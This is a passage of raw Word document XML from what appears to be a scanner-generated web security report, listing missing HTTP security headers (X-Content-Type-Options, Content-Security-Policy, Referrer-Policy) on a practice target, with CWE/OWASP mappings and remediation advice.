          <w:p w14:paraId="6A857EA3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E5821BD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId115">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="719FCAF8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F64CB1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30E8E4D7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId116">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A3A7525" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACD93E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35170055" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E748A6E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.16 Missing security header: X-Content-Type-Options </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4A1D6A67" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67EF77B9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D0E546" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="30F88BF1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A8A465" wp14:editId="0BB78884">
                  <wp:extent cx="1397000" cy="1397000"/>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01F88B1D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6587C0B1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="23F826E3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36FD974D"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558A2435"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39A22E8E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DE0D64E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="74446B26" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F9BF619" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId117">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D3CE5B1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Response headers do not include the X-Content-Type-Options HTTP security header</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId118">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FCF8551" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A5FA6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We noticed that the target application's server responses lack the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header. This header is particularly important for preventing Internet Explorer from reinterpreting the content of a web page (MIME-sniffing) and thus overriding the value of the Content-Type header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75743A71" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F30AC6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that lack of this header could make possible attacks such as Cross-Site Scripting or phishing in Internet Explorer browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0FBDD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB0E07" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We recommend setting the X-Content-Type-Options header such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0955D3A0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA453A1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId119">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07290B4D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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3A9C66A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CA34B35" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F891FF9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="30BADC0A" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D19F9CB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0890A948" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId120">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-693</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0C2CA6ED" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B983DE8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8BB1B0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId121">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4D3EBC79" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280C7A7C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01C3BD38" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId122">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AD15176" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F151A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68495C3C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164692C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.17 Missing security header: Content-Security-Policy </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="010B97A5" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6423B518" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E73A14" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="69ABDB5E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AFCF0EB" wp14:editId="74B32D5A">
                  <wp:extent cx="1397000" cy="1397000"/>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1A367CC1" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C53709" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="0CDD208D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="375CCACC"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702979EF"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7DDCCBA9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7E08EF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1B508603" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0237C01C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId123">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FD1B66F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Response does not include the HTTP Content-Security-Policy security header or meta tag</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId124">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B31E8B8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9CD8F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the target application lacks the Content-Security-Policy (CSP) header in its HTTP responses. The CSP header is a security measure that instructs web browsers to enforce specific security rules, effectively preventing the exploitation of Cross-Site Scripting (XSS) vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FC463" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDD0D9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that if the target application is vulnerable to XSS, lack of this header makes it easily exploitable by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871E83B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E6D947" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Configure the Content-Security-Header to be sent with each HTTP response in order to apply the specific policies needed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A5B54" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE5385" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId125">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DD70362" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId126">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CA9C05C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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7F3C8613"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574569B4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF507E4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6A6287FC" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FF07559" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56D2A721" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId127">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-693</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2AEEEC2D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6107B712" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0007164B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId128">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="57BBEEC8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE74547" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05598E7C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId129">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FC45049" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948F45D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED34038" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953732C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.18 Missing security header: Referrer-Policy </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5C4790D3" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="317615C2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A2D84DA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="5F4E5CB6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18DFC890" wp14:editId="5C1E0152">
                  <wp:extent cx="1397000" cy="1397000"/>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3639BC91" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408BDF45" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="51013421" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6003D3B3"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467A2B8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0DDD6FBE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03148D37" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="53C95305" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
